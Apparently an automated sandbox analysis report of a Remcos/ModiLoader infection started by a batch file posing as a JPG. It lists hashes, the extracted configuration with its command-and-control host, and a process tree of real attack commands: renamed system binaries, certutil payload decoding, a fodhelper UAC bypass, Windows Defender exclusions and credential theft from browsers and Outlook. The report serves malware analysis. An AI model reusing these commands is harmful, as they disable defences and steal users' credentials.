Analysis
-
max time kernel
299s -
max time network
304s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-uk -
resource tags
-
submitted
13-04-2024 21:41
General
-
Target
Radio Data,jpg.bat
-
Size
4.7MB
-
MD5
ea56c361741bf90e6eb0ac3bb658b243
-
SHA1
c5518e7149bcab021a6b2adc231d1bcb951efe69
-
SHA256
ceb3d4e400a577a696ba87b6bdb0898638c5e95c6c537462e003fc28c6f58d44
-
SHA512
61ef9b1342382c031eba3a7843a85b0074e940efcb6d9b621b186aff61448ba2eda3c48af538be4cb9434faff2f00b0232b54e49da9dfa0804ed649c57738f25
-
SSDEEP
49152:xezOW2/puR1S5LyWb55JBnZkRidEiXTqdiMTOciC1UMIrpu6zYDMJhlJ48pDug:5
Malware Config
Extracted
remcos
RemoteHost
showlove24.duckdns.org:2500
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-2EZOQ2
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
ModiLoader Second Stage 1 IoCs
-
NirSoft MailPassView 3 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
-
Nirsoft 7 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 20 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 2 IoCs
-
Modifies registry class 5 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Radio Data,jpg.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "5⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\fodhelper.exe"C:\Windows\system32\fodhelper.exe"4⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Radio Data,jpg.bat" "C:\\Users\\Public\\Lewxa.txt" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Radio Data,jpg.bat" "C:\\Users\\Public\\Lewxa.txt" 93⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 123⤵
- Executes dropped EXE
-
C:\Users\Public\Libraries\Lewxa.comC:\\Users\\Public\\Libraries\\Lewxa.com2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c mkdir "\\?\C:\Windows "3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c mkdir "\\?\C:\Windows \System32"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Windows \System32\7454003.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows \System32\7454003.exe"C:\Windows \System32\7454003.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"7⤵
-
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Tqoqvdoh.PIF3⤵
-
C:\Users\Public\Libraries\Lewxa.comC:\Users\Public\Libraries\Lewxa.com /stext "C:\Users\Admin\AppData\Local\Temp\evqvirdordayhzrewxg"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Public\Libraries\Lewxa.comC:\Users\Public\Libraries\Lewxa.com /stext "C:\Users\Admin\AppData\Local\Temp\opvoikoiflsdsffqohbiegv"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
-
C:\Users\Public\Libraries\Lewxa.comC:\Users\Public\Libraries\Lewxa.com /stext "C:\Users\Admin\AppData\Local\Temp\qjbzjczjtukhutbuxsochspshq"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettingsAdminFlows.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=uk --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=6004 --field-trial-handle=2056,i,2925031861192830535,7089573117439845640,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fbt1bkhf.tue.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\evqvirdordayhzrewxgFilesize
4KB
MD5b5a165a0d70acbe4373318c5ca90a49c
SHA138031c824d8a08d705aad62d71e92fbed5bdda59
SHA256b0c66608806cb3f791a89ffb60702fa8034d1a57683297791474390cab237d86
SHA512803be1ca74ee2b58e02b6a5bb5af5cc54f19fbade59e933e2e564b76fb7b9b0929b2275a2570dc2e4ef6fd9eb18d3fd32395c26cd0aab65f6ff533b9d8ba3026
-
C:\Users\Public\Lewxa.txtFilesize
3.3MB
MD5144036cd483c08dc7b5404d3c99aee48
SHA16c22fe3010cbbcc0b4372b12108daa4958f42a4e
SHA256b7cbf6ef7d19f5e9a836232e353ddc5c66b60c38cde7068197d092b66f4835a0
SHA512428d00a36388e4207016e6c8895c2729430c5002cfad53edeb8f1f9fa43f14bdcf8415f98739fcd1771a8f0ed9f39e3154db8731727032f1d5569f1e5cd830ac
-
C:\Users\Public\Libraries\Lewxa.comFilesize
1.6MB
MD5cee443abf9bdff4cdbe84f1b07c5f00f
SHA1f874facf222985c496387f2369c3bba409220452
SHA256ebb904c41fd99887422c55a98b6af0599e26f6f889586011063ffe13d183f98f
SHA512ecdf9fc0fb2462988e06c7076d51e9de7f80761cd00f48329a0264489c73f53cb11e8536225ef8fb05c8952ff32c99dfa37692c3b35813c894bc2f95b4bb9840
-
C:\Users\Public\alpha.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Users\Public\kn.exeFilesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
C:\Users\Public\xkn.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Windows \System32\7454003.exeFilesize
128KB
MD5231ce1e1d7d98b44371ffff407d68b59
SHA125510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA25630951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612
-
C:\Windows \System32\netutils.dllFilesize
112KB
MD58541304aadba4ae8620bb2699f6e0437
SHA1e0b28a6ecd32d3789433217364c1006de9892df8
SHA25650573c81e5773c13a5411e8446d7fb17956865675782239818f7affd40a2fecb
SHA512c18b1233c138229705242e1cdc00970e45e414d8da9c643b1196ec9de261ae18076e22bed6fcc48c07d1f0e851469db9147f083f3c3c76a26b75994419392455
-
C:\windows \system32\KDECO.batFilesize
11KB
MD5c545650595b479c81ad6b9d8882aae39
SHA17a98aa2e6eee23b3c1bba876955d525bc618b3f0
SHA256a3a80983cb33159f0455fa0135789402558baa1460db94d0071318512b8cb5f9
SHA51285ac596a7da9072a28c4178e4fdedc98f1b49c8e3fe5612cfe464833297b13f65d2dc59b52d7fc9970cff8f98d954111229aec0ed9dded454e03b0cf4ebb6ff3
-
memory/1836-97-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1836-90-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1836-104-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1836-123-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/3168-103-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/3168-92-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/3168-99-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/3168-105-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/3168-107-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/4304-71-0x00000000613C0000-0x00000000613E3000-memory.dmpFilesize
140KB
-
memory/4432-58-0x0000000002AD0000-0x0000000003AD0000-memory.dmpFilesize
16.0MB
-
memory/4432-133-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-83-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-84-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-85-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-86-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-87-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-89-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-76-0x0000000000AB0000-0x0000000000AB1000-memory.dmpFilesize
4KB
-
memory/4432-60-0x0000000000400000-0x00000000005AF000-memory.dmpFilesize
1.7MB
-
memory/4432-57-0x0000000002AD0000-0x0000000003AD0000-memory.dmpFilesize
16.0MB
-
memory/4432-161-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-55-0x0000000000AB0000-0x0000000000AB1000-memory.dmpFilesize
4KB
-
memory/4432-160-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-156-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-155-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-150-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-146-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-145-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-141-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-140-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-139-0x000000002D280000-0x000000002D299000-memory.dmpFilesize
100KB
-
memory/4432-126-0x000000002D280000-0x000000002D299000-memory.dmpFilesize
100KB
-
memory/4432-135-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-127-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4432-132-0x000000002D280000-0x000000002D299000-memory.dmpFilesize
100KB
-
memory/4432-134-0x000000002D280000-0x000000002D299000-memory.dmpFilesize
100KB
-
memory/4432-131-0x000000002D280000-0x000000002D299000-memory.dmpFilesize
100KB
-
memory/4432-82-0x00000000151A0000-0x00000000161A0000-memory.dmpFilesize
16.0MB
-
memory/4480-115-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4480-112-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4480-113-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4480-106-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4480-98-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4768-23-0x0000018AB3180000-0x0000018AB31A2000-memory.dmpFilesize
136KB
-
memory/4768-27-0x00007FF93CFC0000-0x00007FF93DA81000-memory.dmpFilesize
10.8MB
-
memory/4768-28-0x0000018AB31B0000-0x0000018AB31C0000-memory.dmpFilesize
64KB
-
memory/4768-29-0x0000018AB31B0000-0x0000018AB31C0000-memory.dmpFilesize
64KB
-
memory/4768-32-0x0000018AB31B0000-0x0000018AB31C0000-memory.dmpFilesize
64KB
-
memory/4768-35-0x00007FF93CFC0000-0x00007FF93DA81000-memory.dmpFilesize
10.8MB